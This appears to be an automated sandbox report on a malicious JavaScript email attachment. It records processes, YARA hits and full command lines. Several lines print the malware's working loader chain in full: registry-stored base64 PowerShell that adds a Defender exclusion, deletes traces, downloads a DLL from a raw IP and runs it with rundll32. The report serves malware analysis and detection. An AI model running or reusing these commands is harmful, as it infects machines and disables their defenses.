Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | March 7, 2023, 9:57 a.m. | March 7, 2023, 10 a.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Attachment-Cc(731).js
3044-
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT
1632 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
1324 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
1392 -
reg.exe "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
2656 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"
2820-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
260-
rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\overvaultUnheroize.dll RS32
908
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane" |
cmdline | powershell $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane" |
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
cmdline | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi |
cmdline | reg add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi |
cmdline | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS |
cmdline | reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA= |
cmdline | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS |
